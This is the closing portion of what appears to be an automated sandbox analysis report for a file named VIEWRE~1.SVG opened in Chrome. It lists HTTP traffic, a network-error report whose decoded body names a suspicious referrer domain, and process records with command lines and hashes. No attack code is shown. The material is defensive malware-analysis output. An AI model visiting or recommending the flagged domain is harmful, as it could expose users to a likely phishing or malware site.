                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-03-19 16:56:49 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: POST, OPTIONS
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-length, content-type
                                                                date: Wed, 19 Mar 2025 16:56:49 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.164972835.190.80.14436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:56:50 UTC534OUTPOST /report/v4?s=7LZPigoFhvALOM1VTa7BK1%2FMbIxCPLKX%2FKudtsWlmV%2FxPZHTNSeJEWl%2Bk84ToP3t2%2FLG%2BJuDJCXY9d8AEN9ZSUTliM6b23KKlLPuwWinOaWH1GvUVxg9MeD%2Bb9izWV2GXbw2V%2BIk HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 501
                                                                Content-Type: application/reports+json
                                                                Origin: https://cdnjs.cloudflare.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-03-19 16:56:50 UTC501OUTData Raw: 5b 7b 22 61 67 65 22 3a 36 30 30 30 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 36 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 62 64 78 6f 2e 71 64 68 66 77 61 65 73 2e 65 73 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 37 2e 32 34 2e 31 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e
                                                                Data Ascii: [{"age":60002,"body":{"elapsed_time":1160,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://abdxo.qdhfwaes.es/","sampling_fraction":1.0,"server_ip":"104.17.24.14","status_code":200,"type":"http.response.invalid.incomplete_chun


                                                                Statistics

                                                                CPU Usage

                                                                050100s020406080100

                                                                Click to jump to process

                                                                Memory Usage

                                                                050100s0.0050100MB

                                                                Click to jump to process

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:12:55:43
                                                                Start date:19/03/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\VIEWRE~1.SVG
                                                                Imagebase:0x7ff77eaf0000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false
                                                                Show Windows behavior

                                                                File Activities

                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                Show Windows behavior

                                                                COM Activities

                                                                Show Windows behavior

                                                                Process Activities

                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                Show Windows behavior

                                                                Memory Activities

                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                Show Windows behavior

                                                                Process Token Activities


                                                                General

                                                                Target ID:1
                                                                Start time:12:55:44
                                                                Start date:19/03/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,13598698509280980246,18089039725013681096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
                                                                Imagebase:0x7ff77eaf0000
                                                                File size:3'388'000 bytes
                                                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false
                                                                Show Windows behavior

                                                                File Activities

                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                Show Windows behavior

                                                                Memory Activities

                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                Disassembly

                                                                No disassembly